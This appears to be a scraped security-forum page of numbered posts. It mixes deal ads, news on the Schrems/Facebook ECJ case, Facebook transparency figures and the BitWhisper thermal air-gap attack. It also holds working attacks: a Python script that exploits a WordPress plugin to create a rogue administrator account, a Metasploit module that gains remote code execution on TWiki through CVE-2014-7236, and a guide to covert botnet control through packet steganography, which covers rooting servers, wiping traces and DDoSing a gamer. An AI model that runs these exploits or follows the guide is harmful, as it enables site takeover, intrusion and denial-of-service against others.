socket.setdefaulttimeout(timeout) username = id_generator() pwd = id_generator() body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call', 'execute' : 'wp_insert_user', 'user_login' : username, 'user_pass' : pwd, 'role' : 'administrator'}) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} print "[+] Tryng to connect to: "+host try: req = urllib2.Request(host+"/", body, headers) response = urllib2.urlopen(req) html = response.read() if html == "": print("[!] Account Added") print("[!] Location: "+host+"/wp-login.php") print("[!] Username: "+username) print("[!] Password: "+pwd) else: print("[X] Exploitation Failed :(") except urllib2.HTTPError as e: print("[X] "+str(e)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e)) Source
  19. Product Description Easy Backup Software for Laptops and PCs A reliable and easy-to-use backup software for home users to back up photos, music, videos, documents, emails, etc. Affordable yet Powerful – fast, safe and easy, only 50% of the price of competitors. Easy to Install and Simple to Use – intuitive interface guiding you step-by-step. Recommended by many famous websites – wins a lot of awards from PC World, Cnet, Softpedia, ToptenREVIEWS, etc. Reliable and Secure – back up any crucial data and protect them in a safe way. It is an advanced and reliable data backup & system disaster recovery software for home desktops and laptops. It enables users to perform backup operation oriented on complete system & file backup to fully protect important data with comprehensive differential/incremental backup and fast system snapshot. Backup Features Backup system – one-click system backup. Back up entire system state (operation system and installed applications) on-the-fly without interrupting Windows work. Backup all files – network shared files, specified files & folders and different kinds of file types can be full or selectively backed up. Outlook backup and restore – backs up of all your email messages in Outlook and save them in a safe way, so you always can access them, especially when you accidentally delete emails. Backup certain file type in specified folder – allows you to specify one file type to backup in certain folder, avoiding monotonous and boring manual efforts. Add Network-attached storage – just one time to add Network – attached Storage (NAS) as the destination, and enjoy the convenience of easy backup process forever. New! Backup data including contacts, messages, call logs, documents, music, photos, videos in Android device. Recovery Benefit Specified file recovery – Directly recover individual files from disk/partition backup image, no need to recover the whole image for saving much disk space and time. System migration – fast, easy and safely migrate system to a SSD without reinstalling windows. System Snapshot – take a snapshot of the current system for fast system recovery from crashed/failed system. Disk & partition recovery – fast recover the whole hard disk, partition, dynamic volume or GPT disk to original or different hardware to upgrade & migrate hard disk. New! Recover data including contacts, messages, call logs, documents, music, photos, videos in Android device. Special Benefits Copy to cloud for double protection of data. Clone disk for hard drive upgrade (GPT disk included). Explore backup image file in Windows Explorer. Automatically delete old images to save disk space. -> Download <-Deal Expire in:
  20. Product Description CloudBerry Box provides bi-directional synchronization of data across remote computers. Synchronization between end-points is performed through your cloud storage account. No 3rd party services involved into data processing. Sync local content on several computers. All changes automatically apply across all end-points Use your own cloud storage account to synchronize data on remote computers. Amazon S3, Microsoft Azure, Google Cloud, Rackspace and other. Download and install CloudBerry Box on all computers you want to synchronize. Set up your cloud storage account and specify local folder to store synchronized data on each of the machines. All changes made to the folder and contents will be automatically uploaded to the cloud and applied to all computers sharing access to the cloud storage account. All data moves through direct connections between end-points and your cloud storage account. No 3rd party web services involved in data transfers or processing. -> Download <-Deal Expire in:
  21. The European Court of Justice (ECJ) has begun hearing evidence in a case relating to Facebook, PRISM and the ownership of online data that could have far-reaching consequences for data protection and EU-US relations. The case was passed to the ECJ by the Irish courts last summer after Austrian privacy campaigner Max Schrems brought a claim against Facebook saying that it had passed information on users to the US National Security Agency (NSA). The allegations came to light as part of the fallout from the PRISM campaign that was leaked by NSA whistleblower Edward Snowden. Schrems argues that Facebook passing on data from European citizens contravenes ‘safe harbour’ principles that should keep such data in the EU. “Large internet companies (in the current case Facebook) have, pursuant to US law, allowed the US government to access European user data on a mass scale for law enforcement, espionage and anti-terror purposes,” he wrote on the Europe-vs-Facebook page set up to cover the trial. “Aiding these forms of US ‘mass surveillance’ may, however, violate EU privacy laws and fundamental rights.” Specifically the problem is that the safe harbour safeguards require US companies to 'self-certify' that data will be protected when taken outside the US. This system has always been criticised, and the PRISM revelations have only proved these fears correct in the eyes of campaigners like Schrems. "Under EU law such a 'data export' to a third country is only legal if the exporting company (in this case Facebook Ireland Ltd) can ensure an 'adequate protection' for such data in the US," Schrems said in his European Court of Justice hears NSA/PRISM case document (PDF). "In the current case, the plaintiff claims that the NSA’s PRISM programme and other forms of US surveillance are the exact antithesis of 'adequate protection'." The case was referred to the ECJ after a judge in Ireland said there was a requirement for the EU to rule on whether Facebook’s actions were in breach of the law. "The monitoring of global communications - subject, of course, to key safeguards - is accordingly regarded essential if the US is to discharge the mandate which it has assumed," said Judge Desmond Hogan last year. "But there may also be suspicion in some quarters that this type of surveillance has had collateral objects and effects, including the preservation and reinforcing of American global political and economic power." Facebook is the company involved in this case, but the outcome will have far-reaching consequences for the relationship between US technology companies with a major presence in Europe, such as Microsoft and Google. If the ECJ sides with Schrems it could see the entire safe harbour agreement thrown out and new rules brought in to give European citizens more privacy and protection from US authorities. This will, in turn, cause tension between the US security agencies and US technology firms, as data from these companies is key to surveillance operations. The US is already attempting to force Microsoft to hand over data stored on servers overseas, claiming that as a US company it is still subject to US laws, even when operating outside the country. If this challenge proves successful there will be even less protection for EU citizens to keep their data secure, although it could also open the market for European cloud providers to offer services without US interference. Source
  22. AIR-GAPPED SYSTEMS, WHICH are isolated from the Internet and are not connected to other systems that are connected to the Internet, are used in situations that demand high security because they make siphoning data from them difficult. Air-gapped systems are used in classified military networks, the payment networks that process credit and debit card transactions for retailers, and in industrial control systems that operate critical infrastructure. Even journalists use them to prevent intruders from remotely accessing sensitive data. To siphon data from an air-gapped system generally requires physical access to the machine, using removable media like a USB flash drive or a firewire cable to connect the air-gapped system directly to another computer. But security researchers at Ben Gurion University in Israel have found a way to retrieve data from an air-gapped computer using only heat emissions and a computer’s built-in thermal sensors. The method would allow attackers to surreptitiously siphon passwords or security keys from a protected system and transmit the data to an internet-connected system that’s in close proximity and that the attackers control. They could also use the internet-connected system to send malicious commands to the air-gapped system using the same heat and sensor technique. In a video demonstration produced by the researchers, they show how they were able to send a command from one computer to an adjacent air-gapped machine to re-position a missile-launch toy the air-gapped system controlled. The proof-of-concept attack requires both systems to first be compromised with malware. And currently, the attack allows for just eight bits of data to be reliably transmitted over an hour—a rate that is sufficient for an attacker to transmit brief commands or siphon a password or secret key but not large amounts of data. It also works only if the air-gapped system is within 40 centimeters (about 15 inches) from the other computer the attackers control. But the researchers, at Ben Gurion’s Cyber Security Labs, note that this latter scenario is not uncommon, because air-gapped systems often sit on desktops alongside Internet-connected ones so that workers can easily access both. The method was developed by Mordechai Guri, Gabi Kedma and Assaf Kachlon and overseen by their adviser Yuval Elovici. The research represents just a first step says Dudu Mimran, chief technology officer at the lab, who says they plan to present their findings at a security conference in Tel Aviv next week and release a paper describing their work later on. “We expect this pioneering work to serve as the foundation of subsequent research, which will focus on various aspects of the thermal channel and improve its capabilities,” the researchers note in their paper. With additional research, they say they may be able to increase the distance between the two communicating computers and the speed of data transfer between them. In their video demonstration, they used one computer tower to initiate a command to an adjacent computer tower representing an air-gapped system. But future research might involve using the so-called internet of things as an attack vector—an internet-connected heating and air conditioning system or a fax machine that’s remotely accessible and can be compromised to emit controlled fluctuations in temperature. How It Works Computers produce varying levels of heat depending on how much processing they’re doing. In addition to the CPU, the graphics-processing unit and other motherboard components produce significant heat as well. A system that is simultaneously streaming video, downloading files and surfing the internet will consume a lot of power and generate heat. To monitor the temperature, computers have a number of built-in thermal sensors to detect heat fluctuations and trigger an internal fan to cool the system off when necessary or even shut it down to avoid damage. The attack, which the researchers dubbed BitWhisper, uses these sensors to send commands to an air-gapped system or siphon data from it. The technique works a bit like Morse code, with the transmitting system using controlled increases of heat to communicate with the receiving system, which uses its built-in thermal sensors to then detect the temperature changes and translate them into a binary “1” or “0.” To communicate a binary “1” in their demonstration for example, the researchers increased the heat emissions of the transmitting computer by just 1 degree over a predefined timeframe. Then to transmit a “0” they restored the system to its base temperature for another predefined timeframe. The receiving computer, representing the air-gapped system, then translated this binary code into a command that caused it to reposition the toy missile launcher. The researchers designed their malware to take into consideration normal temperature fluctuations of a computer and distinguish these from fluctuations that signal a system is trying to communicate. And although their malware increased the temperature by just one degree to signal communication, an attacker could increase the temperature by any amount as long as it’s within reason, to avoid creating the suspicion that can accompany an overactive computer fan if the computer overheats. Communication can also be bi-directional with both computers capable of transmitting or receiving commands and data. The same method, for example, could have been used to cause their air-gapped system to communicate a password to the other system. The malware on each system can be designed to search for nearby PCs by instructing an infected system to periodically emit a thermal ping—to determine, for example, when a government employee has placed his infected laptop next to a classified desktop system. The two systems would then engage in a handshake, involving a sequence of “thermal pings” of +1C degrees each, to establish a connection. But in situations where the internet-connected computer and the air-gapped one are in close proximity for an ongoing period, the malware could simply be designed to initiate a data transmission automatically at a specified time—perhaps at midnight when no one’s working to avoid detection—without needing to conduct a handshake each time. The time it take to transmit data from one computer to another depends on several factors, including the distance between the two computers and their position and layout. The researchers experimented with a number of scenarios—with computer towers side-by-side, back-to-back and stacked on top of each other. The time it took them to increase the heat and transmit a “1” varied between three and 20 minutes depending. The time to restore the system to normal temperature and transmit a “0” usually took longer. Other Air-Gap Hacking Techniques This isn’t the only way to communicate with air-gapped systems without using physical media. Past research by other teams has focused on using acoustic inaudible channels, optical channels and electromagnetic emissions. All of these, however, are unidirectional channels, meaning they can be used to siphon data but not send commands to an air-gapped system. The same Ben Gurion researchers previously showed how they could siphon data from an air-gapped machine using radio frequency signals and a nearby mobile phone. That proof-of-concept hack involved radio signals generated and transmitted by an infected machine’s video card, which could be used to send passwords and other data over the air to the FM radio receiver in a mobile phone. The NSA reportedly has been using a more sophisticated version of this technique to not only siphon data from air-gapped machines in Iran and elsewhere but also to inject them with malware, according to documents leaked by Edward Snowden. Using an NSA hardware implant called the Cottonmouth-I, which comes with a tiny embedded transceiver, the agency can extract data from targeted systems using RF signals and transmit it to a briefcase-sized relay station up to 8 miles away. There’s no evidence yet that the spy agency is using heat emissions and thermal sensors to steal data and control air-gapped machines— their RF technique is much more efficient than thermal hacking. But if university researchers in Israel have explored the idea of thermal hacking as an attack vector, the NSA has likely considered it too. Source
  23. The Packet Let's look at the packet. That's the thing that makes the internet work, lots of data goes on those, anywhere from 20bytes to 65335 bytes. However, in practice packets are usually around 600 bytes in size. That data stores a lot of info; some is redundant, some is needed, and some is 0'd out. There's a header, a body, extra space, and then error check and footer. It's actually kind of easy to end up with a couple screwed up bits in a packet (obviously not every packet is screwed up, but its not 1 out of every million either). Changing a little bit of the Packet What packet steganography is about is changing a couple of bits over a couple of packets. Similar to image steganography, it's almost impossible to detect (in small quantities) (assuming feds are downloading all the data) as packets are not known to all be made equally. I'm going to quickly give an example. Game A wants to send packet [00010101010001000010101010...000010101011000101...] to Game Server 3. However, you can copy that packet and then resend a slightly modified one, which will look like: [00010101010001000010101010...111110101001001000...] Since a massive amount of data is constantly being sent back and forth from the server to you, the packets can be modified a decent amount so information is carried, but one doesn't have to break the checksum by modifying too many bytes. Multiply 40 bits over a couple thousand packets, and a decent amount of data can be sent covertly from you to the server. What's the best part of this? If you hack servers that get a lot of traffic, it's almost impossible to tell who sent what modded packets to the server even if all of the data is logged because every single packet appears to be legitimate. While there is a decent amount of modded data transferred you can't just go and start downloading ripped movies with this. The point of packet steganography isn't to anonymize your downloads, but to send little messages over networks that won't be found by normal means. Obviously, if person A tries to send messages to person B, A won't send them directly. Instead, he could keep them in an encrypted part of a server. When person B wants to see the message, he unlocks the message by passing the correct key. Psuedocode example using MS Maplestory packets are nice, because they used to be pretty obvious as to what was going on. After the packet header the data of A)what action you were doing and (if a message) what the message was. The message was in plaintext hexidecimal format. Using the code below, we are going to edit a little character of every single message. To anyone looking at the packet it still appears to be a normal message, just with a small typing error. However, to the server and to you, the message really is no longer a message anymore. It's a specific set of instructions. The first couple of whispers to some random person validates to the server that you are the IP to grab the packets from. The final whisper (or packet) the server sees is a specific command to the server. It could be wipe the program on it, it could be tell these servers to do x, y, and z, or it could just be telling the server that there is going to be a new pattern to look out for, and at what certain time. Code for your side: public Whatever{ //obviously it depends for whatever server you hacked into, and what app communicates with the server, but for now lets pretend we hacked into a maplestory server //cool thing about MS is that the packets are pretty easy to understand //yes I realize I am turning Java into a scripting language below, but w/e public void initContact{ for(int i=0; i<10; i++){ String x=scan.grabPacket(); x=x.substring(0,12)+Integer.toHexString(i)+Integer.toHexString(i)+x.substri?ng(14,x.length()); XClass.sendPacket(x); //totally possible if string x winds up being a valid packet, which it is since it's just hex //obviously you have to make a sendPacket method if(scan.nextPacket.equals(neededPacket) XClass.sendPacket(endPacket(Action, Type, IP, Add_Instruct) else System.out.println("Connection was unable to be made"); } } public String endPacket(String x1, String x2, String x3, String x4){ return grabHeader() + " 3A BB 0C FF 2D "+mod(x1)+" "+mod(x2)+" 3C "+mod(x3)+" 85 26 "+mod(x4)+grabFooter(); } } Code for the server(the server is not constantly loading all packets, it only works for a specific amount of time): import everything2.etc //you have to watch out the data storage for this one class ServerInner{ public void acceptEverything() { //kills program in 2 minutes long num = 2 * 60 * 1000; //min*sec*milli Timer t = new Timer(); t.schedule( new TimerTask(){public void run(){} }, num); // no this isn't a legit method, you'd want to use outside resources for this part //but at least the method dies in the two minute timeframe XClass.storeAllPackets(); } public void sortThrough(PacketList P, Method a){ int x=p.length() for(int i=0; i<p.length(); i++){ if(!a.follows(p.get(i))){ p.rem(i); i--; } } //after that method runs, the only packets left should be from you //obviously it is theoretically possible someone else did the exact same as you, so you'd then check them for(int i=0; i<p.length(); i++){ if(!a.check(p.get(i))){ p.rem(i); i--; } } //now all that's left is the correct one } public void finishUP(){ if(p.length()>0){ //translates the info packet from the correct IP if an ip was gathered translate(XClass.nextPacketFrom(p.get1IP()), a); //runs whatever it got run(); } //wipes all data that was stored, logs in database StartClass.wipe(); } } Rough Example in Real Life Application Packet steganography can also be used for sending out instructions to a botnet since you don't really need to send that much information to tell x to DDOS y, now do you? Here's a rough guide of how you'd accomplish communicate through your bots to start a DDOS attack w/ packet steganoraphy, from the setting up the server to the attacking the kid who beat you in MW3 1) Find a good server that has a decent amount of traffic, but nothing too sketchy. 2) Get root access on this server. 3) Download wireshark if you don't already have it. 4a)Write your program to test the wireshark logs to find a pattern in packet anomalies (you figure this one out on your own ). 4b)Write the program that can send out edited packets from your machine. 5) Set up another program that connects the wireshark program with your botnet server. 6) Set up a last program that wipes your traces of you fucking off with the server. 7) Run 6 and leave the shell you set up if you want (I suggest keeping some part of it intact though, depends on what you want to do). 8) Set up a couple more of these steno servers. 9) Realize that you can now send instructions easily but make it look like its a normal connection. Want to ddos server agh554? Connect with one of those servers and send the right kind of packets for a little while. Next thing you know your DDOS servers will be connecting with each other to get the details down and start the attack at the time specified. Because of the way the information is transferred from you to the server it'll be hard to trace the botnet back to you and then convict you as the one who pulled the strings behind a DDOS of a n00b MW3 player. I know that a couple people already do this, but now you know how too. Ending Thoughts (Read it though) So why the hell does this matter? A) all the data will look legitimate you can send it from different sources and it doesn't really matter as long as the packets are getting screwed correctly C) You think it's easy to look through every single packet sent to a server that gets a lot of traffic for the past 4ish months and then find the packets that link with the pattern? D) can be used for stuff other than botnets i) You can send encryption keys through this and then wipe the programs you installed. ii) anonymous communcation E) MITM attacks don't matter unless the MITM got your src(look at number 4) Problems with this? 1) Server gets taken by the feds. They won't be too happy about this 2) A wingding manages to replicate the correct stream, and then gives out commands for your server. This is something you'll just have to accept. Anonymity is what we are going for, too many traces = too many chances of someone finding a link 3) No well known VPNs allow packet modification at the moment. 4) if the feds got your SRC since you and 800 other skids are using the same program, and they catch you are modding packets, you're kinda screwed if they catch you redhanded 5) "I don't get it" Solutions to the problems 1) If modded packets are the only connections between your bots and your servers, its a lot harder to trace since the server has a massive amount of people using it 2) Nothing really, make it so it can't easily be replicated 3) wait for it [breathing intensifies] 4) Don't be a skid 5) See above. Or, read the links at the bottom of the page, learn something interesting, and prove to me that there are users with brains here Credits: TF
  24. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'TWiki Debugenableplugins Remote Code Execution', 'Description' => %q{ TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution }, 'Author' => [ 'Netanel Rubin', # from Check Point - Discovery 'h0ng10', # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-7236'], [ 'OSVDB', '112977'], [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236'] ], 'Privileged' => false, 'Targets' => [ [ 'Automatic', { 'Payload' => { 'BadChars' => "", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python php', } }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 09 2014')) register_options( [ OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]), OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin']) ], self.class) end def send_code(perl_code) uri = target_uri.path data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit" res = send_request_cgi!({ 'method' => 'POST', 'uri' => uri, 'data' => data }) return res end def check rand_1 = rand_text_alpha(5) rand_2 = rand_text_alpha(5) code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")" res = send_code(code) if res and res.code == 200 return CheckCode::Vulnerable if res.body == rand_1 + rand_2 end CheckCode::Unknown end def exploit code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");" code += "require('MIME/Base64.pm');MIME::Base64->import();" code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit" res = send_code(code) handler end end Source
  25. Facebook today reported a slight drop in government requests for user data, bucking a trend that peaked during the first half of 2014 with the highest numbers the company had seen. Its latest transparency report covers the second half of last year, and shows slight dips in requests for user data, the number of accounts referenced and the percentage of requests where Facebook turned over some data. The numbers are still high, however, and demonstrate a continued interest on the part of the government to use data from web-based services in criminal and national security cases. Despite dips in requests in the United States—and Germany—Facebook said overall requests for user account data was up slightly from its last report, as was the number of government requests for data and content restrictions. In the U.S., for example, Facebook received 14,274 requests for user data affected 21,731 accounts; Facebook said it complied with 79 percent of those requests, turning over some content or user data. Content restriction requests, meanwhile, were almost exclusively dominated by India and Ukraine. By comparison, Facebook through the first six months of 2014, fielded 15,433 requests for user data affecting 23,667 accounts; in 80 percent of those occasions, Facebook turned over some data. “We publish this information because we want people to know the extent and nature of the requests we receive from governments and the policies we have in place to process them,” said Monika Bickert, head of Facebook global policy management, and Chris Sonderby, Deputy General Counsel. “Moving forward, we will continue to scrutinize each government request and push back when we find deficiencies. We will also continue to push governments around the world to reform their surveillance practices in a way that maintains the safety and security of their people while ensuring their rights and freedoms are protected.” Facebook also provided some insight into its Community Standards, which define what is acceptable content that is allowed to be posted on the social network. Bickert and Sonderby said there are occasions, for example, when Facebook is asked to remove or restrict access to content because it violates local law, even though it may be within the bounds of its standards. Those numbers are also included in today’s report, along with more detail and examples of what constitutes Facebook’s Community Standards. “We challenge requests that appear to be unreasonable or overbroad,” Bickert and Sonderby said. “And if a country requests that we remove content because it is illegal in that country, we will not necessarily remove it from Facebook entirely, but may restrict access to it in the country where it is illegal.” Source
×
×
  • Create New...